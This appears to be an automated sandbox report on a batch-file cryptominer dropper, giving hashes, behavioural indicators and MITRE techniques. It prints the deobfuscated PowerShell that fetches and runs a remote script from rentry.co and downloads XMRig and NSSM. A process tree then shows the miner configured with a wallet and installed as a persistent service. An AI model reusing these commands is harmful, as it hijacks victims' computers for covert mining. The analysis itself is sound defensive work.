xmrig | 4a084dd6b556a67848483a5763f8d3eebadc0527f804f102f7f944b23b31cb12

Analysis

max time kernel
1050s
max time network
1052s
platform
windows10-2004_x64
resource
win10v2004-20240611-en
resource tags

arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system
submitted
28/06/2024, 23:33 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

vers1.bat
Size

517B
MD5

ac9d73455d58bfa42f81e718b8c8d6b5
SHA1

60040fff333b7bc09b22e5c013f11b8a99555ed3
SHA256

4a084dd6b556a67848483a5763f8d3eebadc0527f804f102f7f944b23b31cb12
SHA512

ad24994554a8e6bb68f5ca80b1c53379f7a577964165f56d2f6bef14340fec3d0f17d14faa2db4651776a83bd5686f26ee59080ee2a16d0468b8d38504e460b2

Score

10^/10

xmrig evasion execution miner

Malware Config

Extracted

Language

ps1

Deobfuscated

1
$wc = new-object system.net.webclient
2
$tempfile = [system.io.path]::gettempfilename()
3
$tempfile = ".bat"
4
$wc.downloadfile("https://rentry.co/regele/raw", ".bat")
5
.bat 42 crnhwckm6bmza8jmwyvwb2tjacxqgmj1qhhj9ae55qrx488q6cvau42ekkeied2n9te1ujnviusnvqv1nj17r79fdhjvl
6
remove-item -force $tempfile
7

URLs

exe.dropper

https://rentry.co/regele/raw

Extracted

Language

ps1

Deobfuscated

1
$wc = new-object system.net.webclient
2
$wc.downloadfile("https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip", "C:\\Users\\Admin\\xmrig.zip")
3

URLs

exe.dropper

https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip

Extracted

Language

ps1

Deobfuscated

1
$wc = new-object system.net.webclient
2
$wc.downloadfile("https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/nssm.zip", "C:\\Users\\Admin\\nssm.zip")
3

URLs

exe.dropper

https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/nssm.zip

Signatures

XMRig Miner payload 64 IoCs

miner

resource	yara_rule
behavioral2/files/0x000e000000023359-63.dat	family_xmrig
behavioral2/files/0x000e000000023359-63.dat	xmrig
behavioral2/memory/5096-66-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4860-201-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4860-202-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4860-203-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4860-204-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4860-205-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4860-206-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4860-207-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4860-208-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4860-209-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4860-210-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4860-211-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4860-212-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4860-213-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4860-214-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4860-215-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4860-216-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4860-217-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4860-218-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4860-219-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4860-220-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4860-221-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4860-222-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4860-223-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4860-224-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4860-225-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4860-226-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4860-227-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4860-228-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4860-229-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4860-230-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4860-231-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4860-232-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4860-233-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4860-235-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4860-236-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4860-237-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4860-238-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4860-239-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4860-240-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4860-241-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4860-242-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4860-243-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4860-244-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4860-245-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4860-246-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4860-247-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4860-248-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4860-249-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4860-250-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4860-251-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4860-252-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4860-253-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4860-254-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4860-255-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4860-256-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4860-257-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4860-258-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4860-259-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4860-260-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4860-261-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/4860-262-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Blocklisted process makes network request 3 IoCs

flow	pid	Process
7	4968	powershell.exe
16	2848	powershell.exe
28	1936	powershell.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Executes dropped EXE 9 IoCs

pid	Process
5096	xmrig.exe
5100	nssm.exe
1052	nssm.exe
4580	nssm.exe
672	nssm.exe
1968	nssm.exe
2676	nssm.exe
2300	nssm.exe
4860	xmrig.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
28	raw.githubusercontent.com
15	raw.githubusercontent.com
16	raw.githubusercontent.com

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
5096	sc.exe
3984	sc.exe
2892	sc.exe
4388	sc.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 13 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4900	powershell.exe
2676	powershell.exe
3200	powershell.exe
4892	powershell.exe
64	powershell.exe
4968	powershell.exe
2848	powershell.exe
4328	powershell.exe
432	powershell.exe
1936	powershell.exe
3308	powershell.exe
4896	powershell.exe
4396	powershell.exe

Delays execution with timeout.exe 64 IoCs

evasion

pid	Process
4756	timeout.exe
3440	timeout.exe
3312	timeout.exe
3024	Process not Found
2888	timeout.exe
2012	Process not Found
3980	Process not Found
1564	timeout.exe
2132	timeout.exe
2064	timeout.exe
1332	Process not Found
1344	Process not Found
968	timeout.exe
5028	timeout.exe
2636	timeout.exe
3224	Process not Found
4260	Process not Found
2760	Process not Found
1924	timeout.exe
3528	timeout.exe
1356	timeout.exe
3500	timeout.exe
1492	Process not Found
4340	timeout.exe
3684	timeout.exe
4720	timeout.exe
2176	Process not Found
3128	Process not Found
3628	timeout.exe
4452	timeout.exe
4912	timeout.exe
3988	timeout.exe
1484	timeout.exe
4292	Process not Found
316	Process not Found
2804	Process not Found
4632	timeout.exe
3944	timeout.exe
4992	timeout.exe
2896	timeout.exe
4624	timeout.exe
1984	timeout.exe
828	timeout.exe
1564	timeout.exe
2888	Process not Found
1364	Process not Found
3916	Process not Found
3836	Process not Found
2772	Process not Found
4332	timeout.exe
4936	timeout.exe
1584	timeout.exe
1724	timeout.exe
4708	timeout.exe
4436	timeout.exe
2600	timeout.exe
2172	Process not Found
3656	timeout.exe
2636	timeout.exe
2872	timeout.exe
4000	Process not Found
2808	Process not Found
5052	Process not Found
1824	Process not Found

Kills process with taskkill 1 IoCs

evasion

pid	Process
1968	taskkill.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 38 IoCs

pid	Process
4968	powershell.exe
4968	powershell.exe
2848	powershell.exe
2848	powershell.exe
2848	powershell.exe
4900	powershell.exe
4900	powershell.exe
4900	powershell.exe
4328	powershell.exe
4328	powershell.exe
4328	powershell.exe
3308	powershell.exe
3308	powershell.exe
3308	powershell.exe
2676	powershell.exe
2676	powershell.exe
2676	powershell.exe
3200	powershell.exe
3200	powershell.exe
3200	powershell.exe
4896	powershell.exe
4896	powershell.exe
4896	powershell.exe
4892	powershell.exe
4892	powershell.exe
4892	powershell.exe
432	powershell.exe
432	powershell.exe
432	powershell.exe
64	powershell.exe
64	powershell.exe
64	powershell.exe
1936	powershell.exe
1936	powershell.exe
1936	powershell.exe
4396	powershell.exe
4396	powershell.exe
4396	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4968	powershell.exe
Token: SeDebugPrivilege	1968	taskkill.exe
Token: SeDebugPrivilege	2848	powershell.exe
Token: SeDebugPrivilege	4900	powershell.exe
Token: SeDebugPrivilege	4328	powershell.exe
Token: SeDebugPrivilege	3308	powershell.exe
Token: SeDebugPrivilege	2676	powershell.exe
Token: SeDebugPrivilege	3200	powershell.exe
Token: SeDebugPrivilege	4896	powershell.exe
Token: SeDebugPrivilege	4892	powershell.exe
Token: SeDebugPrivilege	432	powershell.exe
Token: SeDebugPrivilege	64	powershell.exe
Token: SeDebugPrivilege	1936	powershell.exe
Token: SeDebugPrivilege	4396	powershell.exe
Token: SeLockMemoryPrivilege	4860	xmrig.exe
Token: SeIncreaseQuotaPrivilege	5008	WMIC.exe
Token: SeSecurityPrivilege	5008	WMIC.exe
Token: SeTakeOwnershipPrivilege	5008	WMIC.exe
Token: SeLoadDriverPrivilege	5008	WMIC.exe
Token: SeSystemProfilePrivilege	5008	WMIC.exe
Token: SeSystemtimePrivilege	5008	WMIC.exe
Token: SeProfSingleProcessPrivilege	5008	WMIC.exe
Token: SeIncBasePriorityPrivilege	5008	WMIC.exe
Token: SeCreatePagefilePrivilege	5008	WMIC.exe
Token: SeBackupPrivilege	5008	WMIC.exe
Token: SeRestorePrivilege	5008	WMIC.exe
Token: SeShutdownPrivilege	5008	WMIC.exe
Token: SeDebugPrivilege	5008	WMIC.exe
Token: SeSystemEnvironmentPrivilege	5008	WMIC.exe
Token: SeRemoteShutdownPrivilege	5008	WMIC.exe
Token: SeUndockPrivilege	5008	WMIC.exe
Token: SeManageVolumePrivilege	5008	WMIC.exe
Token: 33	5008	WMIC.exe
Token: 34	5008	WMIC.exe
Token: 35	5008	WMIC.exe
Token: 36	5008	WMIC.exe
Token: SeIncreaseQuotaPrivilege	5008	WMIC.exe
Token: SeSecurityPrivilege	5008	WMIC.exe
Token: SeTakeOwnershipPrivilege	5008	WMIC.exe
Token: SeLoadDriverPrivilege	5008	WMIC.exe
Token: SeSystemProfilePrivilege	5008	WMIC.exe
Token: SeSystemtimePrivilege	5008	WMIC.exe
Token: SeProfSingleProcessPrivilege	5008	WMIC.exe
Token: SeIncBasePriorityPrivilege	5008	WMIC.exe
Token: SeCreatePagefilePrivilege	5008	WMIC.exe
Token: SeBackupPrivilege	5008	WMIC.exe
Token: SeRestorePrivilege	5008	WMIC.exe
Token: SeShutdownPrivilege	5008	WMIC.exe
Token: SeDebugPrivilege	5008	WMIC.exe
Token: SeSystemEnvironmentPrivilege	5008	WMIC.exe
Token: SeRemoteShutdownPrivilege	5008	WMIC.exe
Token: SeUndockPrivilege	5008	WMIC.exe
Token: SeManageVolumePrivilege	5008	WMIC.exe
Token: 33	5008	WMIC.exe
Token: 34	5008	WMIC.exe
Token: 35	5008	WMIC.exe
Token: 36	5008	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4260	WMIC.exe
Token: SeSecurityPrivilege	4260	WMIC.exe
Token: SeTakeOwnershipPrivilege	4260	WMIC.exe
Token: SeLoadDriverPrivilege	4260	WMIC.exe
Token: SeSystemProfilePrivilege	4260	WMIC.exe
Token: SeSystemtimePrivilege	4260	WMIC.exe
Token: SeProfSingleProcessPrivilege	4260	WMIC.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
4860	xmrig.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 748 wrote to memory of 4968	748	cmd.exe	91
PID 748 wrote to memory of 4968	748	cmd.exe	91
PID 4968 wrote to memory of 3528	4968	powershell.exe	94
PID 4968 wrote to memory of 3528	4968	powershell.exe	94
PID 3528 wrote to memory of 5100	3528	cmd.exe	96
PID 3528 wrote to memory of 5100	3528	cmd.exe	96
PID 5100 wrote to memory of 1900	5100	net.exe	97
PID 5100 wrote to memory of 1900	5100	net.exe	97
PID 3528 wrote to memory of 4744	3528	cmd.exe	98
PID 3528 wrote to memory of 4744	3528	cmd.exe	98
PID 3528 wrote to memory of 4636	3528	cmd.exe	99
PID 3528 wrote to memory of 4636	3528	cmd.exe	99
PID 3528 wrote to memory of 1664	3528	cmd.exe	100
PID 3528 wrote to memory of 1664	3528	cmd.exe	100
PID 3528 wrote to memory of 3984	3528	cmd.exe	101
PID 3528 wrote to memory of 3984	3528	cmd.exe	101
PID 3528 wrote to memory of 3204	3528	cmd.exe	102
PID 3528 wrote to memory of 3204	3528	cmd.exe	102
PID 3528 wrote to memory of 2892	3528	cmd.exe	103
PID 3528 wrote to memory of 2892	3528	cmd.exe	103
PID 3528 wrote to memory of 4388	3528	cmd.exe	104
PID 3528 wrote to memory of 4388	3528	cmd.exe	104
PID 3528 wrote to memory of 1968	3528	cmd.exe	105
PID 3528 wrote to memory of 1968	3528	cmd.exe	105
PID 3528 wrote to memory of 2848	3528	cmd.exe	107
PID 3528 wrote to memory of 2848	3528	cmd.exe	107
PID 3528 wrote to memory of 4900	3528	cmd.exe	110
PID 3528 wrote to memory of 4900	3528	cmd.exe	110
PID 3528 wrote to memory of 4328	3528	cmd.exe	111
PID 3528 wrote to memory of 4328	3528	cmd.exe	111
PID 3528 wrote to memory of 5096	3528	cmd.exe	113
PID 3528 wrote to memory of 5096	3528	cmd.exe	113
PID 3528 wrote to memory of 2516	3528	cmd.exe	114
PID 3528 wrote to memory of 2516	3528	cmd.exe	114
PID 2516 wrote to memory of 3308	2516	cmd.exe	116
PID 2516 wrote to memory of 3308	2516	cmd.exe	116
PID 3308 wrote to memory of 452	3308	powershell.exe	117
PID 3308 wrote to memory of 452	3308	powershell.exe	117
PID 3528 wrote to memory of 2676	3528	cmd.exe	118
PID 3528 wrote to memory of 2676	3528	cmd.exe	118
PID 3528 wrote to memory of 3200	3528	cmd.exe	119
PID 3528 wrote to memory of 3200	3528	cmd.exe	119
PID 3528 wrote to memory of 4896	3528	cmd.exe	120
PID 3528 wrote to memory of 4896	3528	cmd.exe	120
PID 3528 wrote to memory of 4892	3528	cmd.exe	121
PID 3528 wrote to memory of 4892	3528	cmd.exe	121
PID 3528 wrote to memory of 432	3528	cmd.exe	122
PID 3528 wrote to memory of 432	3528	cmd.exe	122
PID 3528 wrote to memory of 64	3528	cmd.exe	123
PID 3528 wrote to memory of 64	3528	cmd.exe	123
PID 3528 wrote to memory of 1936	3528	cmd.exe	124
PID 3528 wrote to memory of 1936	3528	cmd.exe	124
PID 3528 wrote to memory of 4396	3528	cmd.exe	126
PID 3528 wrote to memory of 4396	3528	cmd.exe	126
PID 3528 wrote to memory of 5096	3528	cmd.exe	127
PID 3528 wrote to memory of 5096	3528	cmd.exe	127
PID 3528 wrote to memory of 3984	3528	cmd.exe	128
PID 3528 wrote to memory of 3984	3528	cmd.exe	128
PID 3528 wrote to memory of 5100	3528	cmd.exe	129
PID 3528 wrote to memory of 5100	3528	cmd.exe	129
PID 3528 wrote to memory of 1052	3528	cmd.exe	130
PID 3528 wrote to memory of 1052	3528	cmd.exe	130
PID 3528 wrote to memory of 4580	3528	cmd.exe	131
PID 3528 wrote to memory of 4580	3528	cmd.exe	131

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\vers1.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:748
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$wc = New-Object System.Net.WebClient; $tempfile = [System.IO.Path]::GetTempFileName(); $tempfile += '.bat'; $wc.DownloadFile('https://rentry.co/regele/raw', $tempfile); & $tempfile 42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL; Remove-Item -Force $tempfile"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4968
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp441.tmp.bat" 42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3528
  - - C:\Windows\system32\net.exe
      net session
      4⤵
      Suspicious use of WriteProcessMemory
      PID:5100
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        5⤵
        
        PID:1900
  - - C:\Windows\system32\where.exe
      where powershell
      4⤵
      PID:4744
  - - C:\Windows\system32\where.exe
      where find
      4⤵
      PID:4636
  - - C:\Windows\system32\where.exe
      where findstr
      4⤵
      PID:1664
  - - C:\Windows\system32\where.exe
      where tasklist
      4⤵
      PID:3984
  - - C:\Windows\system32\where.exe
      where sc
      4⤵
      PID:3204
  - - C:\Windows\system32\sc.exe
      sc stop moneroocean_miner
      4⤵
      Launches sc.exe
      PID:2892
  - - C:\Windows\system32\sc.exe
      sc delete moneroocean_miner
      4⤵
      Launches sc.exe
      PID:4388
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /t /im xmrig.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1968
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip', 'C:\Users\Admin\xmrig.zip')"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2848
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Admin\xmrig.zip', 'C:\Users\Admin\moneroocean')"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4900
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"donate-level\": *\d*,', '\"donate-level\": 1,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4328
  - - C:\Users\Admin\moneroocean\xmrig.exe
      "C:\Users\Admin\moneroocean\xmrig.exe" --help
      4⤵
      Executes dropped EXE
      PID:5096
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2516
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3308
      - C:\Windows\system32\HOSTNAME.EXE
        
        "C:\Windows\system32\HOSTNAME.EXE"
        6⤵
        
        PID:452
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"url\": *\".*\",', '\"url\": \"gulf.moneroocean.stream:10001\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2676
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"user\": *\".*\",', '\"user\": \"42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3200
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"pass\": *\".*\",', '\"pass\": \"Pxhstppu\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4896
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"max-cpu-usage\": *\d*,', '\"max-cpu-usage\": 100,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4892
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"log-file\": *null,', '\"log-file\": \"C:\\Users\\Admin\\moneroocean\\xmrig.log\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:432
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config_background.json' | %{$_ -replace '\"background\": *false,', '\"background\": true,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config_background.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:64
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/nssm.zip', 'C:\Users\Admin\nssm.zip')"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1936
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Admin\nssm.zip', 'C:\Users\Admin\moneroocean')"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4396
  - - C:\Windows\system32\sc.exe
      sc stop moneroocean_miner
      4⤵
      Launches sc.exe
      PID:5096
  - - C:\Windows\system32\sc.exe
      sc delete moneroocean_miner
      4⤵
      Launches sc.exe
      PID:3984
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" install moneroocean_miner "C:\Users\Admin\moneroocean\xmrig.exe"
      4⤵
      Executes dropped EXE
      PID:5100
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppDirectory "C:\Users\Admin\moneroocean"
      4⤵
      Executes dropped EXE
      PID:1052
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppPriority BELOW_NORMAL_PRIORITY_CLASS
      4⤵
      Executes dropped EXE
      PID:4580
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppStdout "C:\Users\Admin\moneroocean\stdout"
      4⤵
      Executes dropped EXE
      PID:672
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppStderr "C:\Users\Admin\moneroocean\stderr"
      4⤵
      Executes dropped EXE
      PID:1968
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" start moneroocean_miner
      4⤵
      Executes dropped EXE
      PID:2676
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1920
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:5008
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1308
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3984
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4260
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4580
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1300
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3996
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2624
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3876
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1204
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3652
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1060
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3432
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3028
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4224
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
